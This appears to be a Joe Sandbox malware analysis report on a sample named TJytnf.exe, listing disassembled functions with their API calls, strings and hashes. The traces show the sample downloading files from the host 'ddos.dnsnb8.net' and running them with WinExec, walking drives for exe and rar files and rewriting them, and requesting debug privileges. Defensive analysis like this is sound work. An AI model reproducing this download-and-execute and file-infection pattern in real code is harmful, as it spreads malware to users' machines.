Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
Instruction ID: 6ef43b866e82f3513f8c0b0e81522870bcf4ae598b1323f2f16c687a8000aed2
Opcode Fuzzy Hash: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
Instruction Fuzzy Hash: CD51E5B16403016BF720AF50EC45BAB73A4EF81715F40042EFA45962C1EBBDD9198B9A

Analysis Process: TJytnf.exePID: 7356, Parent PID: 7304COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	18.9%
Total number of Nodes:	297
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00C029E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C02A02
wsprintfA.USER32 ref: 00C02A1A
memset.MSVCRT ref: 00C02A44
lstrlen.KERNEL32(?), ref: 00C02A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00C02A6C
strrchr.MSVCRT ref: 00C02A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00C02A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00C02AAE
memset.MSVCRT ref: 00C02AC6
memset.MSVCRT ref: 00C02ADA
FindFirstFileA.KERNEL32(?,?), ref: 00C02AEF
memset.MSVCRT ref: 00C02B13
lstrcmpiA.KERNEL32(?,?), ref: 00C02B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00C02B67
FindClose.KERNEL32(00000000), ref: 00C02B6E

Strings

C:\, xrefs: 00C02A2F
Documents and Settings, xrefs: 00C02A8D, 00C02A92, 00C02A9A, 00C02AAD
%s*, xrefs: 00C02A14

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: fd5684fcdc9253c6572a6e09028e9efc7dee96e3e2c9b539d66b4baa5d7f5b02
Instruction ID: 7ede36e60cf10fab26fe90f1a2d0f6c3b455db66532f0a01967ad524f086ed40
Opcode Fuzzy Hash: fd5684fcdc9253c6572a6e09028e9efc7dee96e3e2c9b539d66b4baa5d7f5b02
Instruction Fuzzy Hash: 544173B2405389AFDB21DBA0DC8DEEF77ACEB84315F04092AF555C2191E634D748DBA2

Function 00C01099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C0185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01878
Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01880
Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01890
Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01894

WinExec.KERNEL32(?,00000005), ref: 00C010F1
lstrlen.KERNEL32(00C04748), ref: 00C010FA
wsprintfA.USER32 ref: 00C0112A
wsprintfA.USER32 ref: 00C01143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00C0115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00C01169
Sleep.KERNEL32 ref: 00C01179

Strings

http://%s:%d/%s/%s, xrefs: 00C010C2, 00C01141
%s%.8X.exe, xrefs: 00C01124
ddos.dnsnb8.net, xrefs: 00C010C8, 00C010CF, 00C01140, 00C01168
C:\Users\user\AppData\Local\Temp\, xrefs: 00C01119
cj/, xrefs: 00C01135

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-3050893656
Opcode ID: 536936953e306ca87d6f9292ff169038a9e1bc26cdfe34f0541c324c3689055c
Instruction ID: 3a8bd3d51f8a3ed2e1c082ace53d6a4bbadb028be8dee776260d4bba38561720
Opcode Fuzzy Hash: 536936953e306ca87d6f9292ff169038a9e1bc26cdfe34f0541c324c3689055c
Instruction Fuzzy Hash: 092160B5901248BEDB24DBA0DC49FAFBBBCAB05319F1641A5EA01A3090D7749B84DF60

Function 00C01718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00C0174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00C0177C
__aulldiv.LIBCMT ref: 00C01796
__aulldiv.LIBCMT ref: 00C017A8

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C01722
Time, xrefs: 00C0173D, 00C01766
SOFTWARE\GTplus, xrefs: 00C01742, 00C0176B

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-2960472624
Opcode ID: f6e254fca421d06ca14a1495f3be15384735301f179e3508c02b234a88b6a33c
Instruction ID: dff56cbefd8a2dfb63639cd6ad99f93f9e81e45d79351a646fa577e234966e7a
Opcode Fuzzy Hash: f6e254fca421d06ca14a1495f3be15384735301f179e3508c02b234a88b6a33c
Instruction Fuzzy Hash: 32114675A00259BBEB109B94CC89FEFBBBCEB44B14F118125FE11B61C1D6759B44CB60

Function 00C06076 Relevance: 11.1, APIs: 7, Instructions: 615
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00C060BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C060DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C06189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C061A5

Memory Dump Source

Source File: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 72155d79c6ad5d815738dc82ae0305a2ebf2ab85d33b910a8a03d61c062566a9
Instruction ID: c63a4e6d1ac66b48e2d723d44e233a3afc32575fdfe35348a20647fdbbb099b1
Opcode Fuzzy Hash: 72155d79c6ad5d815738dc82ae0305a2ebf2ab85d33b910a8a03d61c062566a9
Instruction Fuzzy Hash: A01245B25087858FDB32CF64CC45BEA7BB0EF02310F18459DE8958B2D3D674AA21CB55

Function 00C02B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C02BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00C02BB4
GetDriveTypeA.KERNEL32(?), ref: 00C02BD3
CreateThread.KERNEL32(00000000,00000000,00C02B7D,?,00000000,00000000), ref: 00C02BEE
lstrlen.KERNEL32(?), ref: 00C02BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C02C16
CreateThread.KERNEL32(00000000,00000000,00C02845,00000000,00000000,00000000), ref: 00C02C3A

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 7fdd4b5ee1736b2636e6cf862a7171b4cf2324aeba77d4227d3d6a6b24bb9b32
Instruction ID: b5d1b33f44d83624218cff78bbccd089db46f5515bc0767d2cf20f8ddabc1020
Opcode Fuzzy Hash: 7fdd4b5ee1736b2636e6cf862a7171b4cf2324aeba77d4227d3d6a6b24bb9b32
Instruction Fuzzy Hash: 6921B7B180019CAFEB309F649C88FAF7B6DFF45348F150125F96692191D7348E06CB61

Function 00C01E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00C032B0,00000164,00C02986,?), ref: 00C01EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00C01ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00C01EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00C01F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00C01F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00C0201E
memset.MSVCRT ref: 00C020D8
memset.MSVCRT ref: 00C020EA
memcpy.MSVCRT ref: 00C0222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C02238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C0224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022DD
WriteFile.KERNEL32(000000FF,00C04008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C0230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C02322
UnmapViewOfFile.KERNEL32(?,?,00C032B0,00000164,00C02986,?), ref: 00C02340
FindCloseChangeNotification.KERNEL32(?,?,00C032B0,00000164,00C02986,?), ref: 00C0234E
CloseHandle.KERNEL32(000000FF,?,00C032B0,00000164,00C02986,?), ref: 00C02359

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3349749541-0
Opcode ID: 8810fac30741163ac5a60fc1f016209b1381d56683453ac1e8dfbf285bdcc697
Instruction ID: bd611845d56fb6834336e430a8e38553de6f08eff000a06574b2ba33a535b1b7
Opcode Fuzzy Hash: 8810fac30741163ac5a60fc1f016209b1381d56683453ac1e8dfbf285bdcc697
Instruction Fuzzy Hash: D3F17F71900219EFDB24DFA4DC85AAEBBB9FF08314F10452AE919A76A1D730AE41DF50

Function 00C01973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00C04E5C,00000000,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01992
CreateFileA.KERNEL32(00C04E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C019BA
Sleep.KERNEL32(00000064), ref: 00C019C6
wsprintfA.USER32 ref: 00C019EC
CopyFileA.KERNEL32(00C04E5C,?,00000000), ref: 00C01A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C01A1E
GetFileSize.KERNEL32(00C04E5C,00000000), ref: 00C01A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C01A46
ReadFile.KERNEL32(00C04E5C,00C04E60,00000000,?,00000000), ref: 00C01A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00C01A90
DeleteFileA.KERNEL32(?), ref: 00C01AA7
VirtualFree.KERNEL32(00C04E60,00000000,00008000), ref: 00C01AC1

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C0197C
2, xrefs: 00C019CF
%s%.8X.data, xrefs: 00C019E6
C:\Users\user\AppData\Local\Temp\, xrefs: 00C019DB

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\TJytnf.exe
API String ID: 2523042076-2942807796
Opcode ID: 19f66c9e6a3d77f0a23513840fe292050965b4263be4d89954157050717aec7a
Instruction ID: 301d0a66387a5623ae09192bba573cae843b3296fca53bc2c1edbb5eaec60b3d
Opcode Fuzzy Hash: 19f66c9e6a3d77f0a23513840fe292050965b4263be4d89954157050717aec7a
Instruction Fuzzy Hash: 62514D71A01259EFDF109F98CC84AAEBBBDEB04354F144569F925E61D0D3709F41DBA0

Function 00C028B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C028D3
wsprintfA.USER32 ref: 00C028F7
memset.MSVCRT ref: 00C02925
wsprintfA.USER32 ref: 00C02940

Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02A02
Part of subcall function 00C029E2: wsprintfA.USER32 ref: 00C02A1A
Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02A44
Part of subcall function 00C029E2: lstrlen.KERNEL32(?), ref: 00C02A54
Part of subcall function 00C029E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00C02A6C
Part of subcall function 00C029E2: strrchr.MSVCRT ref: 00C02A7C
Part of subcall function 00C029E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00C02A9F
Part of subcall function 00C029E2: lstrlen.KERNEL32(Documents and Settings), ref: 00C02AAE
Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02AC6
Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02ADA
Part of subcall function 00C029E2: FindFirstFileA.KERNEL32(?,?), ref: 00C02AEF
Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02B13

strrchr.MSVCRT ref: 00C02959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00C02974

Strings

exe, xrefs: 00C0296D
%s\, xrefs: 00C0293A
rar, xrefs: 00C02988
C:\Users\user\AppData\Local\Temp\, xrefs: 00C029B3
%s%s, xrefs: 00C028F1

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-3007274656
Opcode ID: e031720fd869fa8b2659a9e3a2deb55016344ba9a6f6558b2c36858cc051ae4b
Instruction ID: fb9bbf54cadb7757c091fd0c2b4b5c65362af407799d44b7a87c2bc7293977b4
Opcode Fuzzy Hash: e031720fd869fa8b2659a9e3a2deb55016344ba9a6f6558b2c36858cc051ae4b
Instruction Fuzzy Hash: 5031A272A4035D7BDF20AB65DC8DFDE776CAB14314F050462F595A20C1E6B49BC4DBA0

Function 00C01638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00C0164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00C0165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\TJytnf.exe,00000104), ref: 00C0166E
CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00C016AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00C016BD

Part of subcall function 00C0139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C013BC
Part of subcall function 00C0139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C013DA
Part of subcall function 00C0139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C01448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C016E5

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C01662, 00C01667, 00C016DD
Documents and Settings, xrefs: 00C01696
C:\Windows\system32, xrefs: 00C01656
C:\Users\user\AppData\Local\Temp\, xrefs: 00C01644

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\TJytnf.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-589618872
Opcode ID: b706f63a635ebd8179c4735cc155e642af37dcb9023b2ef1effec5bf0f053b7a
Instruction ID: 3991203e35b2475fa9577a8871750e70bd81a1d744239aea68ffddf422bcaa6a
Opcode Fuzzy Hash: b706f63a635ebd8179c4735cc155e642af37dcb9023b2ef1effec5bf0f053b7a
Instruction Fuzzy Hash: 471108B1502254BBDF2067A5DD4DF9F7E6DEB01365F050025FB09910E0C6718A40D7B1

Function 00C01000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C01018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C01029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00C01038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C0104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C01075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C0108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C0108E

Strings

http://%s:%d/%s/%s, xrefs: 00C01000
ddos.dnsnb8.net, xrefs: 00C01026

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 6da53ad1c7675ff42b51c9a292524fde19adbf419dbd0b02270a84449819aa5e
Instruction ID: 6c887e93e4944e728470d8f723d3ce50cdec80bbdcbc6c3c7a1a0b83fe4de1b4
Opcode Fuzzy Hash: 6da53ad1c7675ff42b51c9a292524fde19adbf419dbd0b02270a84449819aa5e
Instruction Fuzzy Hash: E80161B150529CBFE7305F609C88F2BBBACDB4479DF054529F695A2090D6705E44CB70

Function 00C02C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C02C57

Part of subcall function 00C01973: PathFileExistsA.SHLWAPI(00C04E5C,00000000,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01992
Part of subcall function 00C01973: CreateFileA.KERNEL32(00C04E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C019BA
Part of subcall function 00C01973: Sleep.KERNEL32(00000064), ref: 00C019C6
Part of subcall function 00C01973: wsprintfA.USER32 ref: 00C019EC
Part of subcall function 00C01973: CopyFileA.KERNEL32(00C04E5C,?,00000000), ref: 00C01A00
Part of subcall function 00C01973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C01A1E
Part of subcall function 00C01973: GetFileSize.KERNEL32(00C04E5C,00000000), ref: 00C01A2C
Part of subcall function 00C01973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C01A46
Part of subcall function 00C01973: ReadFile.KERNEL32(00C04E5C,00C04E60,00000000,?,00000000), ref: 00C01A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00C02C99
WaitForMultipleObjects.KERNEL32(00000001,00C016BA,00000001,000000FF,?,00C016BA,00000000), ref: 00C02CAC
VirtualFree.KERNEL32(00A90000,00000000,00008000,C:\Users\user\AppData\Local\Temp\TJytnf.exe,00C04E5C,00C04E60,?,00C016BA,00000000), ref: 00C02CC2

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C02C69

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe
API String ID: 2042498389-3710522437
Opcode ID: b5f994a8bb4cc12a4bedf3c49048b8e88a936610b13702ccd7f3b41284dcdc8e
Instruction ID: 8cc588dff9b0104a4e0f3d4eb1b763287bf8d71a6d0e50cb58cdb8e73b22274f
Opcode Fuzzy Hash: b5f994a8bb4cc12a4bedf3c49048b8e88a936610b13702ccd7f3b41284dcdc8e
Instruction Fuzzy Hash: BF018FB17412207BE714ABA5EC0EFAFBE6CEF01B60F104124FA25D61C1D6A09A00C7B0

Function 00C014E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00C01504
VirtualQuery.KERNEL32(00C014E1,?,0000001C), ref: 00C01525
ExitProcess.KERNEL32 ref: 00C0157A

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
